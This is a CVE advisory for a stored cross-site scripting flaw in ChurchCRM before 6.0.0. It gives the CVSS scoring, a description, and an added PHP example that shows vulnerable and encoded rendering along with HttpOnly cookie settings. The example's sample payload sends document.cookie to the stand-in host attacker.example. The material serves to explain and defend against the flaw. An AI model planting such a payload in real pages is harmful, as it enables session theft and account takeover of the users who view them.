CVE-2025-68401 MEDIUM

CVE-2025-68401: ChurchCRM has Stored Cross-Site Scripting (XSS) vulnerability that leads to session theft and account takeover

Vendor Churchcrm
Product CRM
Weakness CWE-79 · XSS
Published December 17, 2025
Last update December 18, 2025

CVSS base score

6.2/10
Attack vector Network
Attack complexity Low
Privileges required High
User interaction Passive
Confidentiality None (vulnerable system) / High (subsequent system)
Integrity None (vulnerable system) / High (subsequent system)

CVSS vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N

What the vulnerability does

01 Description

ChurchCRM is an open-source church management system. Before version 6.0.0, the application stores user-supplied HTML/JavaScript without adequate sanitization or output encoding. When other users later view that content, attacker-controlled JavaScript runs in their browser (stored XSS). In affected contexts the script can read data belonging to the application's web origin and perform privileged actions as the victim. Where the session cookie is not marked HttpOnly, the script can also read document.cookie, enabling session theft and account takeover. Per the CVSS vector, planting the payload requires a high-privilege account (PR:H) and the victim only has to view the affected page (UI:P); the impact is scored on the victim's browser session as a subsequent system (SC:H/SI:H). Version 6.0.0 fixes the issue.
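The pattern behind this class of bug, as an added PHP example that is not ChurchCRM's code: a stored string echoed straight into HTML beside the same rendering with context-correct output encoding, plus the HttpOnly cookie setting that blunts the session-theft step. The field name, the sample payload and the helper names are hypothetical and constructed for illustration.

```php
<?php
// Added example (not ChurchCRM code): stored XSS via unencoded output, the
// hardened rendering beside it, and the HttpOnly cookie mitigation.
declare(strict_types=1);

// Constructed sample of attacker-controlled content as it might sit in the
// database after a high-privilege user saved it through a normal form.
const STORED_NOTE = '<img src=x onerror="fetch(\'https://attacker.example/?c=\''
    . '+encodeURIComponent(document.cookie))">';

// Vulnerable pattern: the stored string is concatenated into the page as-is,
// so the browser parses the attacker's markup and fires the onerror handler.
function renderNoteVulnerable(string $note): string
{
    return '<div class="note">' . $note . '</div>';
}

// Hardened pattern: encode for the HTML text context. ENT_QUOTES also encodes
// single quotes, so the same helper is safe inside quoted attribute values;
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8, and the
// explicit charset removes any dependence on the runtime default.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function renderNoteSafe(string $note): string
{
    return '<div class="note">' . e($note) . '</div>';
}

// Defense in depth for the cookie-theft step: set HttpOnly (and Secure,
// SameSite) on the session cookie before session_start(), so document.cookie
// cannot read it even if an XSS does land. This limits impact; it does not
// fix the injection itself, and the script can still act as the victim.
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
        'path'     => '/',
    ]);
}

// Simple check a test suite could run: the safe rendering must not contain
// the attacker's tag as live markup, only as encoded text.
function containsLiveTag(string $html, string $tag = '<img'): bool
{
    return str_contains($html, $tag);
}

if (PHP_SAPI === 'cli') {
    echo renderNoteVulnerable(STORED_NOTE), "\n"; // a browser would run the handler
    echo renderNoteSafe(STORED_NOTE), "\n";       // rendered as literal text
    echo containsLiveTag(renderNoteVulnerable(STORED_NOTE)) ? "vulnerable\n" : "ok\n";
    echo containsLiveTag(renderNoteSafe(STORED_NOTE)) ? "vulnerable\n" : "ok\n";
}
```

Note that htmlspecialchars() is correct only for HTML text and quoted-attribute contexts; content placed inside a script block, a URL or an event handler needs the encoding for that context instead, and if the application has to render user-supplied rich HTML on purpose, an allow-list sanitizer rather than encoding is the right tool. Requires PHP 8.0 or later for str_contains().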

Key dates

02 Disclosure timeline

December 17, 2025 CVE published
December 18, 2025 Record updated

Related vulnerabilities

04 Related CVE